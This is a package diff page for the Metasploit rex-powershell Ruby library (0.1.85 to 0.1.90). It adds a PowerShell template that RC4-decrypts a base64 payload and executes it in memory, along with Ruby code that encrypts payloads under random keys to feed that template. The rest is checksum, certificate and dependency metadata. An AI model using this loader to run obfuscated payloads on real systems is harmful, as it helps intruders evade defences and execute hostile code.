rex-powershell 0.1.85 → 0.1.90
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/.travis.yml +1 -1
- data/data/templates/to_mem_rc4.ps1.template +40 -0
- data/lib/rex/powershell/command.rb +8 -1
- data/lib/rex/powershell/payload.rb +22 -0
- data/lib/rex/powershell/version.rb +1 -1
- data/rex-powershell.gemspec +5 -5
- metadata +39 -38
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 0a33516521ac7e860fca2bc66ae38f9859cac0588b657c8ffbe2e5ce8120adde
|
4
|
+
data.tar.gz: 222e5ad9199ac80d8c8ec1b88d9504550f89b8811bc36dfc5df9bd34f3c7f329
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 2d048a4d9875adff24b0a7168813918bfa36914130fb41df3666242f2553571b9afe0befac3daa3117f557f0881289e0ec21ceefe2b11922315747a73b6613ff
|
7
|
+
data.tar.gz: df1b2109a3ffb337e5691f1a517ee08a99cb335c7b916c820a62e8caef91437a4c6815ad02bb7910daebb05a010acd51c79cc7ce101c7ab617577b9d4d1165ac
|
checksums.yaml.gz.sig
CHANGED
Binary file
|
data.tar.gz.sig
CHANGED
Binary file
|
data/.travis.yml
CHANGED
@@ -0,0 +1,40 @@
|
|
1
|
+
function %{func_rc4_decrypt} {
|
2
|
+
param([Byte[]]$%{var_rc4buffer})
|
3
|
+
|
4
|
+
$%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
|
5
|
+
|
6
|
+
$s = New-Object Byte[] 256;
|
7
|
+
$k = New-Object Byte[] 256;
|
8
|
+
|
9
|
+
for ($i = 0; $i -lt 256; $i++)
|
10
|
+
{
|
11
|
+
$s[$i] = [Byte]$i;
|
12
|
+
$k[$i] = $%{var_key}[$i %% $%{var_key}.Length];
|
13
|
+
}
|
14
|
+
|
15
|
+
$j = 0;
|
16
|
+
for ($i = 0; $i -lt 256; $i++)
|
17
|
+
{
|
18
|
+
$j = ($j + $s[$i] + $k[$i]) %% 256;
|
19
|
+
$temp = $s[$i];
|
20
|
+
$s[$i] = $s[$j];
|
21
|
+
$s[$j] = $temp;
|
22
|
+
}
|
23
|
+
|
24
|
+
$i = $j = 0;
|
25
|
+
for ($x = 0; $x -lt $%{var_rc4buffer}.Length; $x++)
|
26
|
+
{
|
27
|
+
$i = ($i + 1) %% 256;
|
28
|
+
$j = ($j + $s[$i]) %% 256;
|
29
|
+
$temp = $s[$i];
|
30
|
+
$s[$i] = $s[$j];
|
31
|
+
$s[$j] = $temp;
|
32
|
+
[int]$t = ($s[$i] + $s[$j]) %% 256;
|
33
|
+
$%{var_rc4buffer}[$x] = $%{var_rc4buffer}[$x] -bxor $s[$t];
|
34
|
+
}
|
35
|
+
|
36
|
+
$%{var_rc4buffer}
|
37
|
+
}
|
38
|
+
|
39
|
+
&([scriptblock]::create(([system.Text.Encoding]::UTF8).GetString((%{func_rc4_decrypt} ([System.Convert]::FromBase64String("%{b64payload}"))))))
|
40
|
+
|
@@ -123,6 +123,8 @@ module Command
|
|
123
123
|
# powershell profile (-NoProfile)
|
124
124
|
# @option opts [String] :windowstyle The window style to use
|
125
125
|
# (-WindowStyle)
|
126
|
+
# @option opts [String] :version The version of Powershell to run
|
127
|
+
# (-version)
|
126
128
|
#
|
127
129
|
# @return [String] Powershell command arguments
|
128
130
|
def self.generate_psh_args(opts)
|
@@ -157,6 +159,8 @@ module Command
|
|
157
159
|
arg_string << '-NoProfile ' if value
|
158
160
|
when :windowstyle
|
159
161
|
arg_string << "-WindowStyle #{value} " if value
|
162
|
+
when :version
|
163
|
+
arg_string << "-Version #{value} " if value
|
160
164
|
end
|
161
165
|
end
|
162
166
|
|
@@ -188,6 +192,7 @@ module Command
|
|
188
192
|
arg_string.gsub!('-OutputFormat ', '-o ')
|
189
193
|
arg_string.gsub!('-Sta ', '-s ')
|
190
194
|
arg_string.gsub!('-WindowStyle ', '-w ')
|
195
|
+
arg_string.gsub!('-Version ', '-v ')
|
191
196
|
end
|
192
197
|
|
193
198
|
# Strip off first space character
|
@@ -301,7 +306,9 @@ EOS
|
|
301
306
|
else
|
302
307
|
fail RuntimeError, 'No Powershell method specified'
|
303
308
|
end
|
304
|
-
|
309
|
+
if opts[:exec_rc4]
|
310
|
+
psh_payload = Rex::Powershell::Payload.to_win32pe_psh_rc4(template_path, psh_payload)
|
311
|
+
end
|
305
312
|
# Run our payload in a while loop
|
306
313
|
if opts[:persist]
|
307
314
|
fun_name = Rex::Text.rand_text_alpha(rand(2) + 2)
|
@@ -1,5 +1,6 @@
|
|
1
1
|
# -*- coding: binary -*-
|
2
2
|
require 'rex/random_identifier'
|
3
|
+
require 'rc4'
|
3
4
|
|
4
5
|
module Rex
|
5
6
|
module Powershell
|
@@ -106,6 +107,27 @@ module Payload
|
|
106
107
|
read_replace_script_template(template_path, "to_mem_msil.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
|
107
108
|
end
|
108
109
|
|
110
|
+
#
|
111
|
+
# PSH script that executes an RC4 encrypted payload with Invoke-Expression
|
112
|
+
# by Adrian Vollmer (SySS GmbH, https://www.syss.de)
|
113
|
+
#
|
114
|
+
def self.to_win32pe_psh_rc4(template_path = TEMPLATE_DIR, code)
|
115
|
+
rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
|
116
|
+
rig.init_var(:func_rc4_decrypt)
|
117
|
+
rig.init_var(:var_rc4buffer)
|
118
|
+
rig.init_var(:var_key)
|
119
|
+
|
120
|
+
key = Rex::Text.rand_text_alpha(rand(8)+8)
|
121
|
+
rc4 = RC4.new(key)
|
122
|
+
enc_code = rc4.encrypt(code)
|
123
|
+
|
124
|
+
hash_sub = rig.to_h
|
125
|
+
hash_sub[:random_key] = key
|
126
|
+
hash_sub[:b64payload] = Rex::Text.encode_base64(enc_code)
|
127
|
+
|
128
|
+
read_replace_script_template(template_path, "to_mem_rc4.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
|
129
|
+
end
|
130
|
+
|
109
131
|
end
|
110
132
|
end
|
111
133
|
end
|
data/rex-powershell.gemspec
CHANGED
@@ -6,8 +6,8 @@ require 'rex/powershell/version'
|
|
6
6
|
Gem::Specification.new do |spec|
|
7
7
|
spec.name = "rex-powershell"
|
8
8
|
spec.version = Rex::Powershell::VERSION
|
9
|
-
spec.authors = [
|
10
|
-
spec.email = [
|
9
|
+
spec.authors = ['Metasploit Hackers']
|
10
|
+
spec.email = ['msfdev@metasploit.com']
|
11
11
|
|
12
12
|
spec.summary = %q{Rex Powershell Utilities}
|
13
13
|
spec.description = %q{Ruby Exploitation(Rex) library for generating/manipulating Powershell scripts}
|
@@ -20,10 +20,10 @@ Gem::Specification.new do |spec|
|
|
20
20
|
|
21
21
|
spec.required_ruby_version = '>= 2.2.0'
|
22
22
|
|
23
|
-
spec.add_development_dependency "
|
24
|
-
spec.add_development_dependency "
|
25
|
-
spec.add_development_dependency "rspec", "~> 3.0"
|
23
|
+
spec.add_development_dependency "rake"
|
24
|
+
spec.add_development_dependency "rspec"
|
26
25
|
|
27
26
|
spec.add_runtime_dependency 'rex-text'
|
28
27
|
spec.add_runtime_dependency 'rex-random_identifier'
|
28
|
+
spec.add_runtime_dependency 'ruby-rc4'
|
29
29
|
end
|
metadata
CHANGED
@@ -1,10 +1,10 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: rex-powershell
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.1.
|
4
|
+
version: 0.1.90
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
|
-
-
|
7
|
+
- Metasploit Hackers
|
8
8
|
autorequire:
|
9
9
|
bindir: exe
|
10
10
|
cert_chain:
|
@@ -64,20 +64,20 @@ cert_chain:
|
|
64
64
|
-----END CERTIFICATE-----
|
65
65
|
- |
|
66
66
|
-----BEGIN CERTIFICATE-----
|
67
|
-
|
67
|
+
MIIFIzCCBAugAwIBAgIQCMePMbkSxvnPeJhYXIfaxzANBgkqhkiG9w0BAQsFADBy
|
68
68
|
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
69
69
|
d3cuZGlnaWNlcnQuY29tMTEwLwYDVQQDEyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQg
|
70
|
-
|
70
|
+
SUQgQ29kZSBTaWduaW5nIENBMB4XDTIwMTAwNzAwMDAwMFoXDTIzMTEwNjEyMDAw
|
71
71
|
MFowYDELMAkGA1UEBhMCVVMxFjAUBgNVBAgTDU1hc3NhY2h1c2V0dHMxDzANBgNV
|
72
72
|
BAcTBkJvc3RvbjETMBEGA1UEChMKUmFwaWQ3IExMQzETMBEGA1UEAxMKUmFwaWQ3
|
73
|
-
|
74
|
-
|
75
|
-
|
76
|
-
|
77
|
-
|
78
|
-
|
79
|
-
|
80
|
-
|
73
|
+
IExMQzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALNTz4zvAy7h/vQp
|
74
|
+
4dr1txXHlABAagkwYYwTMCtHs5PXsJITx/5SAjx5swuaLfze5kPBNF2YImvFlOXY
|
75
|
+
WaB+0PsOnXnaARsDZU683xFlj8izU6IN6VrAHzDLKFBzruJENrOJD/ikbEtbjO/q
|
76
|
+
gFbmS9J9v5ohG/pcRSS0t4ZPAwymf8eCp6QsvOKK/Aymp1RhlRaP8N6N5CIpkhz1
|
77
|
+
9p968iCE+DjOXVYxcWE+jE/7uB1dbgrXykNBujMSS3GULOvVEY28n6NCmrPlo23g
|
78
|
+
yRjYVJ2Vy14nBqnxDZ/yRIfWRVjWoT9TsAEbe9gY29oDpSCSs4wSmLQd5zGCpZ9h
|
79
|
+
r0HDFB8CAwEAAaOCAcUwggHBMB8GA1UdIwQYMBaAFFrEuXsqCqOl6nEDwGD5LfZl
|
80
|
+
dQ5YMB0GA1UdDgQWBBTLBL7DTwumVEKtdCdpHVYMXOFeDzAOBgNVHQ8BAf8EBAMC
|
81
81
|
B4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwdwYDVR0fBHAwbjA1oDOgMYYvaHR0cDov
|
82
82
|
L2NybDMuZGlnaWNlcnQuY29tL3NoYTItYXNzdXJlZC1jcy1nMS5jcmwwNaAzoDGG
|
83
83
|
L2h0dHA6Ly9jcmw0LmRpZ2ljZXJ0LmNvbS9zaGEyLWFzc3VyZWQtY3MtZzEuY3Js
|
@@ -86,59 +86,59 @@ cert_chain:
|
|
86
86
|
JAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBOBggrBgEFBQcw
|
87
87
|
AoZCaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0U0hBMkFzc3Vy
|
88
88
|
ZWRJRENvZGVTaWduaW5nQ0EuY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQEL
|
89
|
-
|
90
|
-
|
91
|
-
|
92
|
-
|
93
|
-
|
94
|
-
|
89
|
+
BQADggEBAN+GL5/myPWg7oH4mVrG7/OhXF1MoYQF0ddaNiqaweEHMuKJBQCVZRbL
|
90
|
+
37HojoKXXv2yyRJBCeTB+ojrxX+5PdLVZa0ss7toWzJ2A1poPXZ1eZvm5xeFD32z
|
91
|
+
YQaTmmNWNI3PCDTyJ2PXUc+bDiNNwcZ7yc5o78UNRvp9Jxghya17Q76c9Ov9wvnv
|
92
|
+
dxxQKWGOQy0m4fBrkyjAyH9Djjn81RbQrqYgPuhd5nD0HjN3VUQLhQbIJrk9TVs0
|
93
|
+
EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
|
94
|
+
9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
|
95
95
|
-----END CERTIFICATE-----
|
96
|
-
date:
|
96
|
+
date: 2021-04-23 00:00:00.000000000 Z
|
97
97
|
dependencies:
|
98
98
|
- !ruby/object:Gem::Dependency
|
99
|
-
name:
|
99
|
+
name: rake
|
100
100
|
requirement: !ruby/object:Gem::Requirement
|
101
101
|
requirements:
|
102
|
-
- - "
|
102
|
+
- - ">="
|
103
103
|
- !ruby/object:Gem::Version
|
104
|
-
version: '
|
104
|
+
version: '0'
|
105
105
|
type: :development
|
106
106
|
prerelease: false
|
107
107
|
version_requirements: !ruby/object:Gem::Requirement
|
108
108
|
requirements:
|
109
|
-
- - "
|
109
|
+
- - ">="
|
110
110
|
- !ruby/object:Gem::Version
|
111
|
-
version: '
|
111
|
+
version: '0'
|
112
112
|
- !ruby/object:Gem::Dependency
|
113
|
-
name:
|
113
|
+
name: rspec
|
114
114
|
requirement: !ruby/object:Gem::Requirement
|
115
115
|
requirements:
|
116
|
-
- - "
|
116
|
+
- - ">="
|
117
117
|
- !ruby/object:Gem::Version
|
118
|
-
version: '
|
118
|
+
version: '0'
|
119
119
|
type: :development
|
120
120
|
prerelease: false
|
121
121
|
version_requirements: !ruby/object:Gem::Requirement
|
122
122
|
requirements:
|
123
|
-
- - "
|
123
|
+
- - ">="
|
124
124
|
- !ruby/object:Gem::Version
|
125
|
-
version: '
|
125
|
+
version: '0'
|
126
126
|
- !ruby/object:Gem::Dependency
|
127
|
-
name:
|
127
|
+
name: rex-text
|
128
128
|
requirement: !ruby/object:Gem::Requirement
|
129
129
|
requirements:
|
130
|
-
- - "
|
130
|
+
- - ">="
|
131
131
|
- !ruby/object:Gem::Version
|
132
|
-
version: '
|
133
|
-
type: :
|
132
|
+
version: '0'
|
133
|
+
type: :runtime
|
134
134
|
prerelease: false
|
135
135
|
version_requirements: !ruby/object:Gem::Requirement
|
136
136
|
requirements:
|
137
|
-
- - "
|
137
|
+
- - ">="
|
138
138
|
- !ruby/object:Gem::Version
|
139
|
-
version: '
|
139
|
+
version: '0'
|
140
140
|
- !ruby/object:Gem::Dependency
|
141
|
-
name: rex-
|
141
|
+
name: rex-random_identifier
|
142
142
|
requirement: !ruby/object:Gem::Requirement
|
143
143
|
requirements:
|
144
144
|
- - ">="
|
@@ -152,7 +152,7 @@ dependencies:
|
|
152
152
|
- !ruby/object:Gem::Version
|
153
153
|
version: '0'
|
154
154
|
- !ruby/object:Gem::Dependency
|
155
|
-
name:
|
155
|
+
name: ruby-rc4
|
156
156
|
requirement: !ruby/object:Gem::Requirement
|
157
157
|
requirements:
|
158
158
|
- - ">="
|
@@ -168,7 +168,7 @@ dependencies:
|
|
168
168
|
description: Ruby Exploitation(Rex) library for generating/manipulating Powershell
|
169
169
|
scripts
|
170
170
|
email:
|
171
|
-
-
|
171
|
+
- msfdev@metasploit.com
|
172
172
|
executables: []
|
173
173
|
extensions: []
|
174
174
|
extra_rdoc_files: []
|
@@ -185,6 +185,7 @@ files:
|
|
185
185
|
- data/templates/to_mem_msil.ps1.template
|
186
186
|
- data/templates/to_mem_old.ps1.template
|
187
187
|
- data/templates/to_mem_pshreflection.ps1.template
|
188
|
+
- data/templates/to_mem_rc4.ps1.template
|
188
189
|
- lib/rex/powershell.rb
|
189
190
|
- lib/rex/powershell/command.rb
|
190
191
|
- lib/rex/powershell/function.rb
|
metadata.gz.sig
CHANGED
Binary file
|